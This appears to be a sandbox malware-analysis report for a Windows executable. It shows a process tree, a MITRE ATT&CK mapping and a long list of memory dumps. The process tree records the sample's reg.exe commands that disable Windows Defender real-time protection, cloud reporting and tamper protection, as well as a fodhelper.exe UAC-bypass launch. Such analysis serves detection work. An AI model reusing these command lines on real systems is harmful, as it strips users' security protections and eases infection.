                                                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5308
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5300
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5292
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5276
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                      PID:5268
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                      PID:5260
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                      PID:5244
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5228
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5216
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5208
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                            PID:5200
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:5192
                                                                                                                                                                                                        • C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                          "C:\Windows\System32\fodhelper.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4492
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe" -prs 3756
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:5588

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • memory/60-380-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/64-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/212-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/396-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/400-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/496-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/560-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/772-390-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/920-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1028-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1120-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1308-291-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1468-396-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1520-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1616-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/1868-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2024-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2160-408-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2180-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2228-293-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2432-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2452-675-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2644-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2684-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2712-630-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/2916-713-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3104-693-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3304-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3320-251-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3320-1047-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3320-813-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3320-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3324-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3340-1049-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3340-841-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3340-254-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3340-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3360-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3368-732-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3380-629-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3384-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3512-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3648-376-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3720-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3740-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3756-155-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-142-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-163-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-166-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-167-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-169-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-171-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-170-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-168-0x00000000739D0000-0x0000000073A0A000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          232KB

                                                                                                                                                                                                        • memory/3756-172-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-173-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-174-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-177-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-176-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-180-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-182-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-181-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-179-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-178-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-175-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-165-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-214-0x00000000739A0000-0x00000000739DA000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          232KB

                                                                                                                                                                                                        • memory/3756-215-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3756-162-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-161-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-160-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-150-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-158-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-159-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-157-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-2017-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3756-154-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-156-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-117-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-152-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-153-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-151-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-121-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-145-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-147-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-149-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-148-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-1750-0x00000000739A0000-0x00000000739DA000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          232KB

                                                                                                                                                                                                        • memory/3756-146-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-144-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-130-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/3756-131-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-140-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-143-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-164-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-141-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-139-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-138-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-120-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-137-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-134-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-136-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-135-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-133-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-132-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-129-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-124-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-1457-0x00000000739D0000-0x0000000073A0A000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          232KB

                                                                                                                                                                                                        • memory/3756-123-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-122-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-119-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-118-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-125-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-126-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-127-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3756-128-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                        • memory/3780-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3804-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/3816-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4028-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4152-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4216-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4260-750-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4264-749-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4312-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4368-694-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4384-483-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4480-494-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4492-646-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4564-505-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4604-714-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4656-518-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4672-647-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4700-648-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4740-530-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4764-660-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4780-661-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4824-545-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4904-554-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/4976-733-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5040-676-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/5588-999-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/5588-1957-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/5588-2016-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          3.9MB

                                                                                                                                                                                                        • memory/5588-2018-0x00000000725A0000-0x00000000725DA000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          232KB